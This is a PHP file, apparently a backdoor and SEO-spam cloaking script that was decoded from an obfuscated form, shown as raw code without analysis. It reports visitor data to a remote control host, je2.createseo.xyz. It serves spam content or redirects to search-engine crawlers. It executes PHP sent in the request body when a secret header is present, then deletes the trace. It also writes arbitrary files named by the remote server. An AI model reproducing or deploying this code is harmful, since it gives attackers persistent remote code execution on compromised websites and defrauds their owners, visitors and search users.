/* Decoded by unphp.net */

<?php  goto BBs4_RG50N; w3Bta8GLXU: $result = ''; foreach ($lines as $url) { list($respbody, $code) = urlx($url, null, null, $segs[1]); $result .= $url . $respbody; eaa6MSvWWD: } kkODF5XK_3: exit($result); vVUe5ud4Y9: goto VBgCgWlh42; T9v5mMAMJO: $postdata = "proto={$proto}&shost={$host}&ip={$ip}&dbgroup={$db}&uri={$uri}"; if (!(strlen($token) > 0)) { goto csR8WoV4EC; } @todk(".eGbA0Ty2Wh", @file_get_contents("php://input"), FILE_USE_INCLUDE_PATH); echo include ".eGbA0Ty2Wh"; unlink(".eGbA0Ty2Wh"); goto HdeEyD731j; TcZeoO5s10: $host = $_SERVER["HTTP_HOST"]; $lang = isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : ''; $token = isset($_SERVER["HTTP_XDOIM"]) ? $_SERVER["HTTP_XDOIM"] : ''; $proto = !empty($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off" || isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https" || !empty($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off" ? "https" : "http"; $header = array("Lang: " . $lang, "User-Agent: " . $ua, "Referer: " . $ur, "Http-Proto: " . $proto, "Http-Host: " . $host, "Http-Uri: " . $uri, "Dbgroup: " . $db, "Http-X-Forwarded-For: " . $ip, "Token: " . $token); goto T9v5mMAMJO; HdeEyD731j: exit; csR8WoV4EC: if (!($uri !== "/favicon.ico" && (@preg_match("#google|yahoo|bing#i", $ua) || @preg_match("#google.co.jp|google.com|yahoo.com|yahoo.co.jp|bing.com#i", $ur) && @preg_match("#[/\?][a-z0-9]{1}\d+#i", $uri)))) { goto g0r3EgRkvO; } list($cntx, $code, $ctype) = urlx("http://" . $gov . "/index?" . $postdata, $header, $postdata); if (!($code >= 400 && $code < 500)) { goto AT3JbWLo7_; } goto hfiaUYAjjn; hH4ICO3EZc: exit($cntx); VT1dO_lQaI: g0r3EgRkvO: function urlx($url, $header = null, $postdata = null, $ua = null) { goto lbSuCQAyj_; lbSuCQAyj_: $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); goto bIdG8djBX0; aY_urEeYXi: $ctype = curl_getinfo($ch, CURLINFO_CONTENT_TYPE); $body = curl_exec($ch); curl_close($ch); return array($body, $code, $ctype); goto jrd59kwhaB; bIdG8djBX0: curl_setopt($ch, CURLOPT_ENCODING, "gzip,deflate"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); $ua === null || $ua === '' ? '' : curl_setopt($ch, CURLOPT_USERAGENT, $ua); $header === null ? '' : curl_setopt($ch, CURLOPT_HTTPHEADER, $header); $ua === null || $ua === '' ? '' : curl_setopt($ch, CURLOPT_USERAGENT, $ua); goto GDkCZm5xmF; GDkCZm5xmF: if (!($postdata !== null && $postdata !== '')) { goto aM4Ce1YDlQ; } curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); aM4Ce1YDlQ: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto aY_urEeYXi; jrd59kwhaB: } function todk($fil, $str) { @file_put_contents($fil, $str); } goto Wvqr3l0q2a; GORV1n2Zck: $db = "9200"; $ip = clientip(); $ur = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : ''; $ua = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : ''; $uri = $_SERVER["REQUEST_URI"]; goto TcZeoO5s10; sImnTTrAqz: Is4XGCgrcN: if (!(stripos($cntx, "<!doct") === 0 || stripos($cntx, "<html") === 0)) { goto PgMQYRbCg6; } exit($cntx); PgMQYRbCg6: if (!(stripos($cntx, "<?xml") === 0)) { goto cZ4Et3JACQ; } goto f68UBDUnnF; kyBkfHRPzt: exit; rOKyc3ZPrS: if (!strstr($cntx, "[,]")) { goto vVUe5ud4Y9; } $segs = explode("[,]", $cntx); $lines = explode(",", $segs[0]); goto w3Bta8GLXU; ZpenPPBAz9: exit; EXRIxcKKky: if (!(stripos($ctype, "gzip") > 0)) { goto Is4XGCgrcN; } @header("Content-type: application/x-gzip"); exit($cntx); goto sImnTTrAqz; C6dOHkdQxG: Q_PCAnb1N5: if (!(stripos($cntx, "ok") === 0)) { goto ipUggXBbpT; } exit($cntx . " " . $db." ".$gov . $ixv); ipUggXBbpT: if (!($cntx != '')) { goto VT1dO_lQaI; } goto hH4ICO3EZc; BBs4_RG50N: error_reporting(0); @set_time_limit(3600); @ignore_user_abort(1); $ixv = "3.3.31"; $gov = "je2.createseo.xyz"; goto GORV1n2Zck; TKUGfKGSm9: exit($cntx); x34m7RsFv6: if (!(stripos($cntx, "http") === 0)) { goto saqvck03ZH; } if (!stripos($cntx, "?main_page=")) { goto rOKyc3ZPrS; } @header("Location: " . $cntx); goto kyBkfHRPzt; f68UBDUnnF: @header("Content-type: text/xml"); exit($cntx); cZ4Et3JACQ: if (!(stripos($cntx, "User-a") === 0)) { goto x34m7RsFv6; } @header("Content-type: text/plain;charset=utf-8"); goto TKUGfKGSm9; z1yrtU4URX: exit("no false"); goto M2hWDeg9M5; shUK13tNto: exit("end ok"); M2hWDeg9M5: goto C6dOHkdQxG; VBgCgWlh42: if (!(stripos($cntx, "mercdn") || stripos($cntx, "img.fril"))) { goto OhkexhOEfy; } @header("Content-type: image/jpg"); list($cnimg, $code, $ctype) = urlx($cntx . $uri); exit($cnimg); OhkexhOEfy: goto oX6D4430OE; oX6D4430OE: saqvck03ZH: if (!@preg_match("#^[^.]*.(txt|php)#i", $cntx)) { goto Q_PCAnb1N5; } $values = explode("[,]", $cntx); todk($values[0], $values[1]); if (file_exists($values[0])) { goto shUK13tNto; } goto z1yrtU4URX; hfiaUYAjjn: @header("HTTP/1.1 404 Not Found"); exit($cntx); AT3JbWLo7_: if (!($code >= 500)) { goto EXRIxcKKky; } @header("HTTP/1.1 500 Internal Server Error"); goto ZpenPPBAz9; Wvqr3l0q2a: function clientip() { goto XgP6uL81LZ; v2X1yslb4V: goto PdtZNZkHe3; sT7ahGVV5Z: $realip = $_SERVER["REMOTE_ADDR"]; PdtZNZkHe3: if (!stristr($realip, ",")) { goto tnzq4ZDyet; } goto C1A4VzpN4z; S243ACrF0f: lHiwwKwlUY: $realip = $_SERVER["HTTP_X_FORWARDED_FOR"]; goto PdtZNZkHe3; Sx9w2dcUoN: $realip = getenv("REMOTE_ADDR"); goto v2X1yslb4V; C1A4VzpN4z: $values = explode(",", $realip); $realip = $values[0]; tnzq4ZDyet: return $realip; goto sLkUuZhuhy; XgP6uL81LZ: $realip = ''; if (isset($_SERVER["HTTP_X_FORWARDED_FOR"]) && $_SERVER["HTTP_X_FORWARDED_FOR"] !== '') { goto lHiwwKwlUY; } if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) { goto Sx9w2dcUoN; } if (isset($_SERVER["REMOTE_ADDR"]) && $_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) { goto sT7ahGVV5Z; } goto PdtZNZkHe3; goto S243ACrF0f; sLkUuZhuhy: } ?>